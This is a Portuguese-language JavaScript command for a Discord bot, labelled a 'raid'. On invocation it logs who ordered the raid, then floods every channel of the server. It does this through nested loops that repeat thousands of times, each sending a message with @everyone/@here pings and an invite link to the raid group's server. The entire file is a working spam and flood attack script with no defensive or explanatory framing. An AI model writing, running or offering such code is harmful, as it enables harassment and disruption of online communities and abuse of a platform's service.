exports.run = async (client, message) => {
  
    console.log("Raid De Everyone Executado No Servidor: " + message.guild.name + " | Quem Ordenou O Raid: " + message.author.username + ` | Id De ${message.author.username}: ${message.author.id}`)
  function a1(){
         client.guilds.get(message.guild.id).channels.forEach((canal) => {
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
           canal.send("Servidor Do Bot De Raid: https://discord.gg/x9jqsb || @everyone | @here ||")
         })
  }
  function r2(){
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
    a1()
  }
  function raid(){
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
    r2()
  }
  raid()
}